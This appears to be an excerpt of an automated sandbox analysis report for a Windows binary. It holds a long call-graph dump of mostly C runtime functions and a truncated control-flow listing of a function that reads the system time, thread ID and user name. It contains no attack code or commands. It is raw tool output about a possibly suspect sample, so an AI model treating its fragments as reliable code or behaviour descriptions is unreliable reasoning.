18124->18131 18126 12d7220 std::locale::_Setgloballocale 37 API calls 18125->18126 18125->18131 18127 12d1500 18126->18127 18128 12db325 __Getctype 37 API calls 18127->18128 18129 12d1516 18128->18129 18145 12db352 18129->18145 18131->18071 18136 12e1acf __cftoe 18132->18136 18137 12e1a33 __cftoe 18132->18137 18134 12e52d8 __fassign 16 API calls 18134->18136 18135 12e1aff 18139 12d3e40 __dosmaperr 11 API calls 18135->18139 18136->18134 18136->18135 18141 12e1aa5 18136->18141 18138 12e1aba 18137->18138 18137->18141 18154 12e52d8 18137->18154 18140 12d3e40 __dosmaperr 11 API calls 18138->18140 18139->18141 18140->18141 18141->18071 18143 12df2eb WideCharToMultiByte 18142->18143 18143->18071 18146 12db37a 18145->18146 18147 12db365 18145->18147 18146->18131 18147->18146 18149 12d8e5e 18147->18149 18150 12d7220 std::locale::_Setgloballocale 37 API calls 18149->18150 18151 12d8e68 18150->18151 18152 12d8d76 __cftof 46 API calls 18151->18152 18153 12d8e6e 18152->18153 18153->18146 18159 12e52ff 18154->18159 18155 12cae19 _ValidateLocalCookies 5 API calls 18157 12e547d 18155->18157 18157->18137 18158 12e5324 18158->18155 18159->18158 18160 12e1bc0 18159->18160 18161 12d3e40 __dosmaperr 11 API calls 18160->18161 18162 12e1bd4 18161->18162 18162->18158 18163->18047 18165 12e45cf std::locale::_Setgloballocale 18164->18165 18175 12dffe3 EnterCriticalSection 18165->18175 18167 12e45dd 18168 12e460f 18167->18168 18169 12e4604 18167->18169 18170 12d3e40 __dosmaperr 11 API calls 18168->18170 18176 12e46dc 18169->18176 18172 12e460a 18170->18172 18190 12e4643 18172->18190 18175->18167 18177 12e025f 22 API calls 18176->18177 18180 12e46ec 18177->18180 18178 12e46f2 18193 12e01ce 18178->18193 18180->18178 18181 12e4724 18180->18181 18184 12e025f 22 API calls 18180->18184 18181->18178 18182 12e025f 22 API calls 18181->18182 18185 12e4730 CloseHandle 18182->18185 18187 12e471b 18184->18187 18185->18178 18186 12e476c 18186->18172 18189 12e025f 22 API calls 18187->18189 18188 12d3e0a __dosmaperr 11 API calls 18188->18186 18189->18181 18202 12e0098 LeaveCriticalSection 18190->18202 18192 12e462c 18192->17975 18194 12e01dd 18193->18194 18195 12e0244 18193->18195 18194->18195 18201 12e0207 18194->18201 18196 12d3e40 __dosmaperr 11 API calls 18195->18196 18197 12e0249 18196->18197 18198 12d3e2d __dosmaperr 11 API calls 18197->18198 18199 12e0234 18198->18199 18199->18186 18199->18188 18200 12e022e SetStdHandle 18200->18199 18201->18199 18201->18200 18202->18192 18203->17945 18205 12e66ba std::locale::_Setgloballocale 18204->18205 18206 12e66cd 18205->18206 18209 12e66ef 18205->18209 18207 12d3e40 __dosmaperr 11 API calls 18206->18207 18208 12e66d2 18207->18208 18210 12cf34f __cftof 22 API calls 18208->18210 18211 12e66f4 18209->18211 18212 12e6701 18209->18212 18213 12c76a7 18210->18213 18214 12d3e40 __dosmaperr 11 API calls 18211->18214 18221 12e4778 18212->18221 18213->17891 18213->17893 18214->18213 18217 12e671d 18229 12e6759 18217->18229 18218 12e6710 18219 12d3e40 __dosmaperr 11 API calls 18218->18219 18219->18213 18222 12e4784 std::locale::_Setgloballocale 18221->18222 18233 12d4e5f EnterCriticalSection 18222->18233 18224 12e4792 18234 12e481c 18224->18234 18231 12e675d 18229->18231 18259 12d0c9a LeaveCriticalSection 18231->18259 18232 12e676e 18232->18213 18233->18224 18242 12e483f 18234->18242 18235 12e479f 18247 12e47d8 18235->18247 18236 12e4897 18237 12d7fb2 __dosmaperr 11 API calls 18236->18237 18238 12e48a0 18237->18238 18240 12d800f _free 11 API calls 18238->18240 18241 12e48a9 18240->18241 18241->18235 18252 12da881 18241->18252 18242->18235 18242->18236 18242->18242 18250 12d0c86 EnterCriticalSection 18242->18250 18251 12d0c9a LeaveCriticalSection 18242->18251 18258 12d4ea7 LeaveCriticalSection 18247->18258 18249 12e47c3 18249->18217 18249->18218 18250->18242 18251->18242 18253 12da553 __dosmaperr 4 API calls 18252->18253 18254 12da89d 18253->18254 18255 12da8bb InitializeCriticalSectionAndSpinCount 18254->18255 18256 12da8a6 18254->18256 18255->18256 18257 12d0c86 EnterCriticalSection 18256->18257 18257->18235 18258->18249 18259->18232 18261 12dcd42 std::locale::_Setgloballocale 18260->18261 18262 12dcd49 18261->18262 18263 12dcd60 18261->18263 18264 12d3e40 __dosmaperr 11 API calls 18262->18264 18298 12d0c86 EnterCriticalSection 18263->18298 18266 12dcd4e 18264->18266 18268 12cf34f __cftof 22 API calls 18266->18268 18267 12dcd6c 18299 12dcbc3 18267->18299 18270 12dcd59 18268->18270 18270->17912 18271 12dcd77 18333 12dcda5 18271->18333 18274 12a6aeb 18273->18274 18275 12a6ac7 18273->18275 18276 12a6afd 18274->18276 18277 12a6bc7 18274->18277 18275->17912 18280 12a1e80 23 API calls 18276->18280 18278 12a1d70 23 API calls 18277->18278 18279 12a6b2f std::locale::_Init 18278->18279 18281 12cf35f std::_Facet_Register 22 API calls 18279->18281 18283 12a6b88 std::ios_base::_Ios_base_dtor std::locale::_Init 18279->18283 18280->18279 18282 12a6bd1 18281->18282 18284 12a6d29 18282->18284 18285 12a6c05 18282->18285 18283->17912 18286 12a1d70 23 API calls 18284->18286 18288 12a6c63 18285->18288 18289 12a6c70 18285->18289 18292 12a6c1a 18285->18292 18287 12a6d2e 18286->18287 18290 12a1e60 Concurrency::cancel_current_task 23 API calls 18287->18290 18288->18287 18288->18292 18291 12a6c27 __cftof std::locale::_Init 18289->18291 18295 12cae5d std::_Facet_Register 23 API calls 18289->18295 18290->18291 18294 12cf35f std::_Facet_Register 22 API calls 18291->18294 18297 12a6ce7 std::ios_base::_Ios_base_dtor __cftof std::locale::_Init 18291->18297 18293 12cae5d std::_Facet_Register 23 API calls 18292->18293 18293->18291 18296 12a6d38 18294->18296 18295->18291 18297->17912 18298->18267 18300 12dcbe1 18299->18300 18302 12dcc47 18299->18302 18301 12dbe5e 22 API calls 18300->18301 18303 12dcbe7 18301->18303 18304 12dbe5e 22 API calls 18302->18304 18332 12dcc3e 18302->18332 18305 12dcc0a 18303->18305 18307 12dbe5e 22 API calls 18303->18307 18306 12dcc5c 18304->18306 18305->18302 18316 12dcc25 18305->18316 18308 12dcc7f 18306->18308 18310 12dbe5e 22 API calls 18306->18310 18309 12dcbf3 18307->18309 18308->18332 18336 12dcde9 18308->18336 18309->18305 18315 12dbe5e 22 API calls 18309->18315 18312 12dcc68 18310->18312 18312->18308 18318 12dbe5e 22 API calls 18312->18318 18313 12dcde9 22 API calls 18313->18316 18314 12dcc9f 18320 12d53a4 __Getctype 37 API calls 18314->18320 18314->18332 18317 12dcbff 18315->18317 18316->18313 18316->18332 18321 12dbe5e 22 API calls 18317->18321 18319 12dcc74 18318->18319 18322 12dbe5e 22 API calls 18319->18322 18323 12dccb7 18320->18323 18321->18305 18322->18308 18324 12dcce1 18323->18324 18326 12dcde9 22 API calls 18323->18326 18356 12db193 18324->18356 18328 12dccc8 18326->18328 18328->18324 18329 12dccce 18328->18329 18343 12dceee 18329->18343 18330 12d3e40 __dosmaperr 11 API calls 18330->18332 18332->18271 18405 12d0c9a LeaveCriticalSection 18333->18405 18335 12dcdab 18335->18270 18337 12dcdad 18336->18337 18338 12d3e40 __dosmaperr 11 API calls 18337->18338 18340 12dcdce 18337->18340 18339 12dcdbe 18338->18339 18341 12cf34f __cftof 22 API calls 18339->18341 18340->18314 18342 12dcdc9 18341->18342 18342->18314 18344 12dcefa std::locale::_Setgloballocale 18343->18344 18345 12dcf16 18344->18345 18346 12dcf01 18344->18346 18359 12d0c86 EnterCriticalSection 18345->18359 18347 12d3e40 __dosmaperr 11 API calls 18346->18347 18349 12dcf06 18347->18349 18351 12cf34f __cftof 22 API calls 18349->18351 18350 12dcf20 18360 12dcdf4 18350->18360 18353 12dcf11 18351->18353 18353->18332 18380 12db051 18356->18380 18359->18350 18361 12dce0c 18360->18361 18363 12dce7c 18360->18363 18362 12dbe5e 22 API calls 18361->18362 18364 12dce12 18362->18364 18367 12dce74 18363->18367 18374 12e342d 18363->18374 18364->18363 18366 12dce64 18364->18366 18368 12d3e40 __dosmaperr 11 API calls 18366->18368 18371 12dcf59 18367->18371 18369 12dce69 18368->18369 18370 12cf34f __cftof 22 API calls 18369->18370 18370->18367 18379 12d0c9a LeaveCriticalSection 18371->18379 18373 12dcf5f 18373->18353 18375 12d8049 std::_Locinfo::_Locinfo_ctor 12 API calls 18374->18375 18376 12e3448 18375->18376 18377 12d800f _free 11 API calls 18376->18377 18378 12e3452 18377->18378 18378->18367 18379->18373 18381 12db066 18380->18381 18395 12db076 18380->18395 18382 12d14c0 __cftof 46 API calls 18381->18382 18381->18395 18383 12db097 18382->18383 18384 12db0c4 18383->18384 18385 12db0a3 18383->18385 18384->18395 18399 12df527 18384->18399 18396 12e19da 18385->18396 18388 12db0ef 18389 12db0f5 18388->18389 18390 12db137 18388->18390 18392 12db11d 18389->18392 18402 12d84e2 18389->18402 18391 12d84e2 __fassign MultiByteToWideChar 18390->18391 18391->18392 18394 12d3e40 __dosmaperr 11 API calls 18392->18394 18392->18395 18394->18395 18395->18330 18395->18332 18397 12e52d8 __fassign 16 API calls 18396->18397 18398 12e19f2 18397->18398 18398->18395 18400 12d14c0 __cftof 46 API calls 18399->18400 18401 12df53a __fassign 18400->18401 18401->18388 18403 12d84f3 MultiByteToWideChar 18402->18403 18403->18392 18405->18335 18406 12a9090 18407 12a90a4 18406->18407 18410 12d338d 18407->18410 18409 12a90ae 18411 12d33bd 18410->18411 18412 12d33d2 18410->18412 18413 12d3e40 __dosmaperr 11 API calls 18411->18413 18412->18411 18414 12d33d6 18412->18414 18415 12d33c2 18413->18415 18420 12d0cae 18414->18420 18417 12cf34f __cftof 22 API calls 18415->18417 18419 12d33cd 18417->18419 18419->18409 18421 12d0cba std::locale::_Setgloballocale 18420->18421 18428 12d0c86 EnterCriticalSection 18421->18428 18423 12d0cc8 18429 12d1650 18423->18429 18428->18423 18445 12dbe9a 18429->18445 18432 12d14c0 __cftof 46 API calls 18433 12d168a 18432->18433 18454 12d1a9a 18433->18454 18440 12cae19 _ValidateLocalCookies 5 API calls 18441 12d0cd5 18440->18441 18442 12d0cfd 18441->18442 18923 12d0c9a LeaveCriticalSection 18442->18923 18444 12d0ce6 18444->18409 18446 12dbe5e 22 API calls 18445->18446 18447 12dbeab 18446->18447 18448 12e2ff4 22 API calls 18447->18448 18449 12dbeb1 18448->18449 18450 12d1673 18449->18450 18451 12d8049 std::_Locinfo::_Locinfo_ctor 12 API calls 18449->18451 18450->18432 18452 12dbf0c 18451->18452 18453 12d800f _free 11 API calls 18452->18453 18453->18450 18475 12d2fe4 18454->18475 18456 12d16ce 18468 12d1553 18456->18468 18457 12d1aba 18458 12d3e40 __dosmaperr 11 API calls 18457->18458 18459 12d1abf 18458->18459 18460 12cf34f __cftof 22 API calls 18459->18460 18460->18456 18462 12d1aab 18462->18456 18462->18457 18482 12d2393 18462->18482 18514 12d1d77 18462->18514 18522 12d2623 18462->18522 18527 12d1e74 18462->18527 18532 12d1fe9 18462->18532 18571 12d2fff 18462->18571 18469 12d800f _free 11 API calls 18468->18469 18470 12d1563 18469->18470 18471 12dbf4d 18470->18471 18472 12dbf58 18471->18472 18473 12d16fd 18471->18473 18472->18473 18474 12dad65 61 API calls 18472->18474 18473->18440 18474->18473 18476 12d2ffc 18475->18476 18477 12d2fe9 18475->18477 18476->18462 18478 12d3e40 __dosmaperr 11 API calls 18477->18478 18479 12d2fee 18478->18479 18480 12cf34f __cftof 22 API calls 18479->18480 18481 12d2ff9 18480->18481 18481->18462 18483 12d23ba 18482->18483 18484 12d2425 18482->18484 18488 12d23fc 18483->18488 18489 12d23c6 18483->18489 18485 12d242c 18484->18485 18486 12d2473 18484->18486 18484->18488 18490 12d23d3 18485->18490 18492 12d2436 18485->18492 18512 12d23f5 18485->18512 18623 12d2ea1 18486->18623 18504 12d23e1 18488->18504 18488->18512 18608 12d2c82 18488->18608 18489->18490 18493 12d240c 18489->18493 18489->18504 18490->18504 18490->18512 18617 12d28a6 18490->18617 18492->18488 18495 12d243b 18492->18495 18493->18512 18594 12d2a9b 18493->18594 18499 12d244e 18495->18499 18500 12d2440 18495->18500 18496 12cae19 _ValidateLocalCookies 5 API calls 18497 12d25f6 18496->18497 18497->18462 18602 12d2dd7 18499->18602 18500->18512 18598 12d2e6a 18500->18598 18503 12d2580 18578 12d31d6 18503->18578 18504->18503 18504->18512 18626 12d134d 18504->18626 18507 12d259a 18508 12d25bc 18507->18508 18510 12d134d 46 API calls 18507->18510 18586 12d3143 18508->18586 18510->18508 18512->18496 18513 12d134d 46 API calls 18513->18512 18879 12d1dc0 18514->18879 18517 12d1d93 18517->18462 18518 12d3e40 __dosmaperr 11 API calls 18519 12d1d85 18518->18519 18520 12cf34f __cftof 22 API calls 18519->18520 18521 12d1d90 18520->18521 18521->18462 18523 12d262d 18522->18523 18524 12d2634 18522->18524 18882 12d1900 18523->18882 18524->18462 18528 12d1e7e 18527->18528 18529 12d1e85 18527->18529 18530 12d1900 47 API calls 18528->18530 18529->18462 18531 12d1e84 18530->18531 18531->18462 18533 12d1ff5 18532->18533 18534 12d2010 18532->18534 18536 12d2042 18533->18536 18537 12d23ba 18533->18537 18538 12d2425 18533->18538 18535 12d3e40 __dosmaperr 11 API calls 18534->18535 18534->18536 18539 12d202d 18535->18539 18536->18462 18545 12d23c6 18537->18545 18549 12d23fc 18537->18549 18541 12d242c 18538->18541 18542 12d2473 18538->18542 18538->18549 18540 12cf34f __cftof 22 API calls 18539->18540 18544 12d2038 18540->18544 18546 12d23d3 18541->18546 18550 12d2436 18541->18550 18569 12d23f5 18541->18569 18543 12d2ea1 23 API calls 18542->18543 18561 12d23e1 18543->18561 18544->18462 18545->18546 18548 12d240c 18545->18548 18545->18561 18551 12d28a6 48 API calls 18546->18551 18546->18561 18546->18569 18547 12d2c82 23 API calls 18547->18561 18555 12d2a9b 46 API calls 18548->18555 18548->18569 18549->18547 18549->18561 18549->18569 18550->18549 18552 12d243b 18550->18552 18551->18561 18556 12d244e 18552->18556 18557 12d2440 18552->18557 18553 12cae19 _ValidateLocalCookies 5 API calls 18554 12d25f6 18553->18554 18554->18462 18555->18561 18558 12d2dd7 22 API calls 18556->18558 18559 12d2e6a 23 API calls 18557->18559 18557->18569 18558->18561 18559->18561 18560 12d2580 18563 12d31d6 46 API calls 18560->18563 18561->18560 18562 12d134d 46 API calls 18561->18562 18561->18569 18562->18560 18564 12d259a 18563->18564 18565 12d25bc 18564->18565 18567 12d134d 46 API calls 18564->18567 18566 12d3143 46 API calls 18565->18566 18568 12d25c8 18566->18568 18567->18565 18568->18569 18570 12d134d 46 API calls 18568->18570 18569->18553 18570->18569 18572 12d301e 18571->18572 18573 12d3005 18571->18573 18572->18462 18573->18572 18574 12d3e40 __dosmaperr 11 API calls 18573->18574 18575 12d3010 18574->18575 18576 12cf34f __cftof 22 API calls 18575->18576 18577 12d301b 18576->18577 18577->18462 18579 12d31e8 18578->18579 18580 12d31f0 18579->18580 18581 12d3e40 __dosmaperr 11 API calls 18579->18581 18584 12d3286 18579->18584 18580->18507 18581->18584 18582 12d32f0 18582->18507 18583 12d3e40 __dosmaperr 11 API calls 18583->18584 18584->18582 18584->18583 18585 12d3063 46 API calls 18584->18585 18585->18584 18587 12d3155 18586->18587 18588 12d31b4 18586->18588 18587->18588 18589 12d315c 18587->18589 18590 12d31d6 46 API calls 18588->18590 18591 12db051 __fassign 46 API calls 18589->18591 18592 12d25c8 18589->18592 18630 12d3063 18589->18630 18590->18592 18591->18589 18592->18512 18592->18513 18595 12d2aca 18594->18595 18596 12db051 __fassign 46 API calls 18595->18596 18597 12d2af6 18595->18597 18596->18597 18597->18504 18599 12d2e76 18598->18599 18600 12d2c82 23 API calls 18599->18600 18601 12d2e88 18600->18601 18601->18504 18604 12d2dec 18602->18604 18603 12d3e40 __dosmaperr 11 API calls 18605 12d2df5 18603->18605 18604->18603 18607 12d2e00 18604->18607 18606 12cf34f __cftof 22 API calls 18605->18606 18606->18607 18607->18504 18609 12d2c95 18608->18609 18610 12d2cb0 18609->18610 18612 12d2cc7 18609->18612 18611 12d3e40 __dosmaperr 11 API calls 18610->18611 18613 12d2cb5 18611->18613 18616 12d2cc0 18612->18616 18682 12d1008 18612->18682 18614 12cf34f __cftof 22 API calls 18613->18614 18614->18616 18616->18504 18618 12d28c6 18617->18618 18695 12d0f8b 18618->18695 18620 12d2907 18705 12dbbca 18620->18705 18622 12d297c 18622->18504 18622->18622 18624 12d2c82 23 API calls 18623->18624 18625 12d2eb8 18624->18625 18625->18504 18627 12d1388 18626->18627 18629 12d135a 18626->18629 18627->18503 18628 12d3063 46 API calls 18628->18629 18629->18627 18629->18628 18631 12d3075 18630->18631 18632 12d307d 18631->18632 18634 12dbd35 18631->18634 18632->18589 18635 12dbd66 18634->18635 18654 12dbd56 18634->18654 18636 12dbe5e 22 API calls 18635->18636 18637 12dbd6e 18636->18637 18638 12dbe5e 22 API calls 18637->18638 18642 12dbd96 18637->18642 18640 12dbd7f 18638->18640 18639 12cae19 _ValidateLocalCookies 5 API calls 18641 12dbe5c 18639->18641 18640->18642 18644 12dbe5e 22 API calls 18640->18644 18641->18632 18643 12dbe5e 22 API calls 18642->18643 18642->18654 18645 12dbdc4 18643->18645 18646 12dbd8b 18644->18646 18647 12dbde7 18645->18647 18649 12dbe5e 22 API calls 18645->18649 18648 12dbe5e 22 API calls 18646->18648 18647->18654 18656 12db308 18647->18656 18648->18642 18650 12dbdd0 18649->18650 18650->18647 18652 12dbe5e 22 API calls 18650->18652 18653 12dbddc 18652->18653 18655 12dbe5e 22 API calls 18653->18655 18654->18639 18655->18647 18659 12db1ad 18656->18659 18660 12db1bd 18659->18660 18661 12db1fb 18660->18661 18662 12db1e7 18660->18662 18673 12db1c2 18660->18673 18664 12d14c0 __cftof 46 API calls 18661->18664 18663 12d3e40 __dosmaperr 11 API calls 18662->18663 18665 12db1ec 18663->18665 18666 12db206 18664->18666 18667 12cf34f __cftof 22 API calls 18665->18667 18668 12db216 18666->18668 18669 12db242 18666->18669 18667->18673 18670 12e1b15 __cftof 11 API calls 18668->18670 18671 12df2d2 __cftof WideCharToMultiByte 18669->18671 18674 12db24a 18669->18674 18672 12db22b 18670->18672 18671->18674 18672->18673 18676 12d3e40 __dosmaperr 11 API calls 18672->18676 18673->18654 18678 12db258 __cftof 18674->18678 18681 12db28f __cftof 18674->18681 18675 12d3e40 __dosmaperr 11 API calls 18675->18673 18676->18673 18677 12d3e40 __dosmaperr 11 API calls 18679 12db2f9 18677->18679 18678->18673 18678->18675 18680 12cf34f __cftof 22 API calls 18679->18680 18680->18673 18681->18673 18681->18677 18683 12d101d 18682->18683 18684 12d102c 18682->18684 18685 12d3e40 __dosmaperr 11 API calls 18683->18685 18686 12d1022 18684->18686 18687 12d8049 std::_Locinfo::_Locinfo_ctor 12 API calls 18684->18687 18685->18686 18686->18616 18688 12d1054 18687->18688 18689 12d106b 18688->18689 18692 12d156d 18688->18692 18691 12d800f _free 11 API calls 18689->18691 18691->18686 18693 12d800f _free 11 API calls 18692->18693 18694 12d157c 18693->18694 18694->18689 18696 12d0faf 18695->18696 18697 12d0fa0 18695->18697 18699 12d0fa5 18696->18699 18700 12d8049 std::_Locinfo::_Locinfo_ctor 12 API calls 18696->18700 18698 12d3e40 __dosmaperr 11 API calls 18697->18698 18698->18699 18699->18620 18701 12d0fd6 18700->18701 18702 12d0fed 18701->18702 18704 12d156d 11 API calls 18701->18704 18703 12d800f _free 11 API calls 18702->18703 18703->18699 18704->18702 18706 12dbbda 18705->18706 18707 12dbbf0 18705->18707 18708 12d3e40 __dosmaperr 11 API calls 18706->18708 18707->18706 18712 12dbc02 18707->18712 18709 12dbbdf 18708->18709 18710 12cf34f __cftof 22 API calls 18709->18710 18711 12dbbe9 18710->18711 18711->18622 18713 12dbc69 18712->18713 18717 12dbc3b 18712->18717 18714 12dbc8c 18713->18714 18715 12dbc87 18713->18715 18734 12db3e1 18714->18734 18718 12dbce6 18715->18718 18719 12dbcb0 18715->18719 18726 12dbb01 18717->18726 18762 12db6fa 18718->18762 18721 12dbcce 18719->18721 18722 12dbcb5 18719->18722 18755 12db8e4 18721->18755 18745 12dba40 18722->18745 18727 12dbb17 18726->18727 18728 12dbb22 18726->18728 18727->18711 18729 12d6dcc ___std_exception_copy 22 API calls 18728->18729 18730 12dbb7d 18729->18730 18731 12dbb87 18730->18731 18732 12cf37c __Getctype 11 API calls 18730->18732 18731->18711 18733 12dbb95 18732->18733 18735 12db3f3 18734->18735 18736 12d14c0 __cftof 46 API calls 18735->18736 18737 12db407 18736->18737 18738 12db40f 18737->18738 18739 12db423 18737->18739 18740 12d3e40 __dosmaperr 11 API calls 18738->18740 18742 12db6fa 48 API calls 18739->18742 18744 12db41e __alldvrm __cftof _strrchr 18739->18744 18741 12db414 18740->18741 18743 12cf34f __cftof 22 API calls 18741->18743 18742->18744 18743->18744 18744->18711 18770 12e1caa 18745->18770 18749 12dbaa0 18750 12dbae0 18749->18750 18752 12dbab9 18749->18752 18753 12dbaa7 18749->18753 18822 12db79c 18750->18822 18819 12db96f 18752->18819 18753->18711 18756 12e1caa 24 API calls 18755->18756 18757 12db911 18756->18757 18758 12e1bea 22 API calls 18757->18758 18759 12db949 18758->18759 18760 12db950 18759->18760 18761 12db96f 46 API calls 18759->18761 18760->18711 18761->18760 18763 12db712 18762->18763 18764 12e1caa 24 API calls 18763->18764 18765 12db72b 18764->18765 18766 12e1bea 22 API calls 18765->18766 18767 12db770 18766->18767 18768 12db777 18767->18768 18769 12db79c 46 API calls 18767->18769 18768->18711 18769->18768 18774 12e1cdd 18770->18774 18771 12d6dcc ___std_exception_copy 22 API calls 18773 12e2fd7 18771->18773 18772 12e1d52 18772->18771 18775 12e2fe7 18773->18775 18780 12e2f8d 18773->18780 18774->18772 18777 12e1da9 18774->18777 18776 12cf37c __Getctype 11 API calls 18775->18776 18778 12e2ff3 18776->18778 18836 12e5540 18777->18836 18779 12cae19 _ValidateLocalCookies 5 API calls 18781 12dba6e 18779->18781 18780->18779 18810 12e1bea 18781->18810 18783 12e1e20 18844 12e5650 18783->18844 18785 12e1e2a 18786 12e20a4 18785->18786 18788 12e1ece 18785->18788 18790 12e212e __cftof 18785->18790 18787 12d4ae8 __cftof 22 API calls 18786->18787 18786->18790 18787->18790 18794 12e1f58 18788->18794 18852 12d4ae8 18788->18852 18791 12d4ae8 __cftof 22 API calls 18790->18791 18793 12e209c 18791->18793 18792 12d4ae8 __cftof 22 API calls 18792->18793 18800 12e249a __cftof std::locale::_Init 18793->18800 18802 12e28ee __cftof std::locale::_Init 18793->18802 18794->18792 18795 12e2d7f 18866 12d4650 18795->18866 18797 12e280e 18798 12e28dc 18797->18798 18799 12d4ae8 __cftof 22 API calls 18797->18799 18798->18795 18801 12d4ae8 __cftof 22 API calls 18798->18801 18799->18798 18800->18797 18808 12d4ae8 22 API calls __cftof 18800->18808 18801->18795 18802->18797 18806 12d4ae8 22 API calls __cftof 18802->18806 18803 12e2e35 18803->18780 18807 12d4650 22 API calls 18803->18807 18809 12d4ae8 __cftof 22 API calls 18803->18809 18804 12e2dcb 18804->18803 18805 12d4ae8 __cftof 22 API calls 18804->18805 18805->18803 18806->18802 18807->18803 18808->18800 18809->18803 18811 12e1bf7 18810->18811 18814 12e1c0d 18810->18814 18812 12d3e40 __dosmaperr 11 API calls 18811->18812 18818 12e1c06 std::locale::_Init 18811->18818 18813 12e1bfc 18812->18813 18816 12cf34f __cftof 22 API calls 18813->18816 18814->18811 18815 12e1c29 18814->18815 18817 12d3e40 __dosmaperr 11 API calls 18815->18817 18816->18818 18817->18813 18818->18749 18820 12d14c0 __cftof 46 API calls 18819->18820 18821 12db985 __cftof 18820->18821 18821->18753 18823 12db7ad 18822->18823 18824 12db7bb 18823->18824 18825 12db7d0 18823->18825 18827 12d3e40 __dosmaperr 11 API calls 18824->18827 18826 12d14c0 __cftof 46 API calls 18825->18826 18831 12db7dc 18826->18831 18828 12db7c0 18827->18828 18829 12cf34f __cftof 22 API calls 18828->18829 18830 12db7ca 18829->18830 18830->18753 18832 12d6dcc ___std_exception_copy 22 API calls 18831->18832 18835 12db859 std::locale::_Init 18832->18835 18833 12cf37c __Getctype 11 API calls 18834 12db8e3 18833->18834 18835->18833 18837 12e557b 18836->18837 18838 12e5549 18836->18838 18840 12e5598 17 API calls 18837->18840 18838->18837 18839 12e5576 18838->18839 18842 12e593e 12 API calls 18839->18842 18841 12e558b 18840->18841 18841->18783 18843 12e5936 18842->18843 18843->18783 18845 12e565d 18844->18845 18847 12e5bb0 __floor_pentium4 18844->18847 18846 12e568e 18845->18846 18845->18847 18848 12e3be6 __floor_pentium4 12 API calls 18846->18848 18850 12e56d8 18846->18850 18849 12dc22c __floor_pentium4 17 API calls 18847->18849 18851 12e5bf2 __floor_pentium4 18847->18851 18848->18850 18849->18851 18850->18785 18851->18785 18853 12d4af9 18852->18853 18862 12d4af5 std::locale::_Init 18852->18862 18854 12d4b00 18853->18854 18856 12d4b13 __cftof 18853->18856 18855 12d3e40 __dosmaperr 11 API calls 18854->18855 18857 12d4b05 18855->18857 18859 12d4b4a 18856->18859 18860 12d4b41 18856->18860 18856->18862 18858 12cf34f __cftof 22 API calls 18857->18858 18858->18862 18859->18862 18864 12d3e40 __dosmaperr 11 API calls 18859->18864 18861 12d3e40 __dosmaperr 11 API calls 18860->18861 18863 12d4b46 18861->18863 18862->18794 18865 12cf34f __cftof 22 API calls 18863->18865 18864->18863 18865->18862 18867 12d466b 18866->18867 18878 12d47b7 __aulldvrm 18866->18878 18868 12d4697 18867->18868 18869 12d46c6 18867->18869 18867->18878 18870 12d4ae8 __cftof 22 API calls 18868->18870 18871 12d46ca 18869->18871 18876 12d470a __aulldvrm 18869->18876 18872 12d46b8 18870->18872 18873 12d4ae8 __cftof 22 API calls 18871->18873 18872->18804 18874 12d46eb 18873->18874 18874->18804 18875 12d4ae8 __cftof 22 API calls 18877 12d4794 18875->18877 18876->18875 18877->18804 18878->18804 18880 12d3063 46 API calls 18879->18880 18881 12d1d7c 18880->18881 18881->18517 18881->18518 18883 12d1917 18882->18883 18884 12d1912 18882->18884 18890 12d3d9d 18883->18890 18886 12d3e40 __dosmaperr 11 API calls 18884->18886 18886->18883 18888 12d3e40 __dosmaperr 11 API calls 18889 12d194b 18888->18889 18889->18462 18891 12d3db8 18890->18891 18894 12d36c0 18891->18894 18895 12d2fe4 std::_Locinfo::_Locinfo_ctor 22 API calls 18894->18895 18898 12d36d5 18895->18898 18896 12d370e 18899 12d14c0 __cftof 46 API calls 18896->18899 18897 12d36ea 18900 12d3e40 __dosmaperr 11 API calls 18897->18900 18898->18896 18898->18897 18910 12d1937 18898->18910 18904 12d371d 18899->18904 18901 12d36ef 18900->18901 18903 12cf34f __cftof 22 API calls 18901->18903 18903->18910 18905 12d3747 18904->18905 18912 12dbf87 18904->18912 18906 12d3a1f 18905->18906 18916 12d3cf1 18905->18916 18907 12d3cf1 std::_Locinfo::_Locinfo_ctor 22 API calls 18906->18907 18909 12d3c55 std::_Locinfo::_Locinfo_ctor 18907->18909 18909->18910 18911 12d3e40 __dosmaperr 11 API calls 18909->18911 18910->18888 18910->18889 18911->18910 18913 12dbfa4 18912->18913 18915 12dbfae 18912->18915 18913->18915 18922 12e304a GetStringTypeW 18913->18922 18915->18904 18917 12d3d1b 18916->18917 18918 12d3d06 18916->18918 18917->18906 18918->18917 18919 12d3e40 __dosmaperr 11 API calls 18918->18919 18920 12d3d10 18919->18920 18921 12cf34f __cftof 22 API calls 18920->18921 18921->18917 18922->18915 18923->18444

              Executed Functions

              Function 012A98F0 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 379timethreadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 12a98f0-12a9993 EnterCriticalSection 1 12a9999-12a99a2 0->1 2 12a9d40-12a9d45 LeaveCriticalSection 0->2 1->2 4 12a99a8-12a99b0 1->4 3 12a9d4b-12a9d51 2->3 5 12a9d53-12a9d65 3->5 6 12a9d81-12a9d9c call 12cae19 3->6 7 12a99be-12a99c5 4->7 8 12a99b2-12a99b8 4->8 11 12a9d77-12a9d7e call 12cae27 5->11 12 12a9d67-12a9d75 5->12 9 12a99de-12a99e1 7->9 10 12a99c7-12a99dc GetSystemTimeAsFileTime 7->10 8->2 8->7 14 12a99e4-12a99ec 9->14 10->14 11->6 12->11 15 12a9da9-12a9daf call 12cf35f 12->15 19 12a99ee-12a99f7 GetCurrentThreadId 14->19 20 12a99fc-12a99fe 14->20 19->20 23 12a9bc3-12a9c49 LeaveCriticalSection call 12cae5d 20->23 24 12a9a04-12a9a32 GetUserNameExW 20->24 33 12a9c4b-12a9c52 23->33 34 12a9c62-12a9c79 23->34 26 12a9a34-12a9a3f 24->26 27 12a9a45-12a9a5b 24->27 26->27 41 12a9b09-12a9b0b 26->41 29 12a9a5d-12a9a62 27->29 30 12a9a90-12a9aa3 GetUserNameExW 27->30 36 12a9a68-12a9a8d call 12a1e80 call 12ccde0 29->36 37 12a9d9f call 129cee0 29->37 31 12a9aad-12a9aaf 30->31 32 12a9aa5-12a9aab 30->32 38 12a9ab2-12a9abb 31->38 59 12a9acd-12a9ad6 32->59 39 12a9c56-12a9c5f call 12a1ee0 33->39 40 12a9c54 33->40 42 12a9c7b-12a9c87 call 12a1ee0 34->42 43 12a9c8c-12a9c94 34->43 36->30 54 12a9da4 call 12cf35f 37->54 38->38 48 12a9abd-12a9acb call 12a1ee0 38->48 39->34 40->39 41->23 46 